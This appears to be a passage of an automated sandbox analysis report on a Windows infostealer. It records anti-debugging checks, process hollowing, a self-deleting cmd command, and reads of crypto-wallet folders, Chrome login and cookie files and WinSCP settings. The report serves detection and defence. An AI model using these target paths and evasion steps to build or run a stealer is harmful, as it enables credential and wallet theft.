Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: file.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: file.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: file.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: file.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: file.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: file.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_00428945 push ecx; ret 2_2_00428958
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_004236AF push ecx; ret 2_2_004236C2
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0041A5D9 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress, 2_2_0041A5D9

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\Desktop\file.exe Process created: "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\user\Desktop\file.exe" & exit
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0041A5D9 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress, 2_2_0041A5D9
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\timeout.exe TID: 3636 Thread sleep count: 49 > 30
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\file.exe Registry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_00416CDA __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,GetSystemInfo, 2_2_00416CDA
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0040C3ED wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 2_2_0040C3ED
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_00412548 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,_memset,lstrcat,lstrcat,_memset,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 2_2_00412548
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_004135E2 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,lstrcat,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,GetFileAttributesA,GetFileAttributesA,GetFileAttributesA,_memset,_memset,_memset,_memset,_memset,_memset,FindNextFileA,FindClose,_memset,lstrcat,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,GetFileAttributesA,GetFileAttributesA,GetFileAttributesA,_memset,_memset,_memset,_memset,_memset,_memset, 2_2_004135E2
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_00409DF4 wsprintfA,FindFirstFileA,_memset,lstrcat,StrCmpCA,StrCmpCA,lstrcpy,lstrcat,lstrcat,_memset,_memset,StrCmpCA,wsprintfA,wsprintfA,lstrlenA,_strtok_s,PathMatchSpecA,CoInitialize,_strtok_s,PathMatchSpecA,lstrcpy,lstrcat,PathFindFileNameA,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,PathMatchSpecA,lstrcpy,PathMatchSpecA,CoInitialize,PathMatchSpecA,lstrcpy,PathMatchSpecA,lstrcpy,lstrcat,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileA,FindClose, 2_2_00409DF4
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_00411603 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,_memset,wsprintfA,StrCmpCA,StrCmpCA,GetFileAttributesA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 2_2_00411603
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0040D624 _memset,lstrcat,wsprintfA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,GetFileAttributesA,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 2_2_0040D624
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_00417F60 __EH_prolog3_GS,FindFirstFileW,FindNextFileW, 2_2_00417F60
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_004118D3 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 2_2_004118D3
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_00409284 __EH_prolog3_GS,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,_memset,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,_memset,lstrcat,lstrlenA,_memset, 2_2_00409284
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_004132B0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,_memset,lstrcat,lstrcat,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,StrCmpCA,StrCmpCA,DeleteFileA,FindNextFileA,FindClose, 2_2_004132B0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0040A392 __EH_prolog3_GS,_memset,_memset,_memset,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetLogicalDriveStringsA,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlenA, 2_2_0040A392
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWH.u%SystemRoot%\system32\mswsock.dll*
Source: file.exe, 00000002.00000002.245137168.000000000073C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E82BB6 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00E82BB6
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0041A5D9 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress, 2_2_0041A5D9
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0040E905 _memset,_memset,_memset,GetProcessHeap,RtlAllocateHeap,_memset,InternetOpenA,InternetSetOptionA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,InternetConnectA,HttpOpenRequestA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlenA,lstrlenA,GetProcessHeap,RtlAllocateHeap,lstrlenA,_memmove,lstrlenA,_memmove,lstrlenA,lstrlenA,_memmove,lstrlenA,HttpSendRequestA,HttpQueryInfoA,StrCmpCA,Sleep,_memset,lstrcat,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 2_2_0040E905
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E82D4C SetUnhandledExceptionFilter, 0_2_00E82D4C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E8285E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00E8285E
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0042A39A SetUnhandledExceptionFilter, 2_2_0042A39A
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0041F69E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_0041F69E
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_00426733 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_00426733
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_00E8285E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_00E8285E
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_00E82BB6 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_00E82BB6
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_00E82D4C SetUnhandledExceptionFilter, 2_2_00E82D4C

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\file.exe Memory written: C:\Users\user\Desktop\file.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\user\Desktop\file.exe" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 6
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Code function: GetProcessHeap,HeapAlloc,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,_memset,LocalFree, 2_2_0041754C
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 2_2_0042C0D6
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea, 2_2_0042E927
Source: C:\Users\user\Desktop\file.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA, 2_2_0042C1CB
Source: C:\Users\user\Desktop\file.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free, 2_2_0042B9B9
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen, 2_2_0042C272
Source: C:\Users\user\Desktop\file.exe Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW, 2_2_0042AA00
Source: C:\Users\user\Desktop\file.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 2_2_0042EA01
Source: C:\Users\user\Desktop\file.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement, 2_2_00424A1C
Source: C:\Users\user\Desktop\file.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage, 2_2_0042C2CD
Source: C:\Users\user\Desktop\file.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage, 2_2_0042C49E
Source: C:\Users\user\Desktop\file.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free, 2_2_0042BCA7
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoA, 2_2_00425CBB
Source: C:\Users\user\Desktop\file.exe Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA, 2_2_0042C55E
Source: C:\Users\user\Desktop\file.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 2_2_0042AD5D
Source: C:\Users\user\Desktop\file.exe Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA, 2_2_0042C5C5
Source: C:\Users\user\Desktop\file.exe Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s, 2_2_0042C601
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E829D2 cpuid 0_2_00E829D2
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E82E39 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_00E82E39
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_004174A0 __EH_prolog3_GS,GetSystemTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime, 2_2_004174A0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0041717C GetUserNameA, 2_2_0041717C

Stealing of Sensitive Information

Source: Yara match File source: 1.3.file.exe.526a20.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.file.exe.526a20.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.7fb280.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.7fb280.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.231893309.000000000079A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.232045586.00000000004BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 5896, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\???[
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\???[
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\???[
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\???[
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\???[
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ElectrumLTC
Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ElectronCash
Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Electrum\wallets\
Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: JaxxLiberty
Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: info.seco
Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Exodus\
Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: passphrase.json
Source: file.exe, 00000002.00000002.245137168.000000000073C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\jaxx\Local Storage\file__0.localstorage5
Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Ethereum\
Source: file.exe String found in binary or memory: Exodus Web3 Wallet
Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: default_wallet
Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Ethereum"
Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: MultiDoge
Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: seed.seco
Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Electrum-LTC\wallets\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: Yara match File source: 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 5896, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 1.3.file.exe.526a20.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.file.exe.526a20.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.7fb280.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.7fb280.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.231893309.000000000079A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.232045586.00000000004BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 5896, type: MEMORYSTR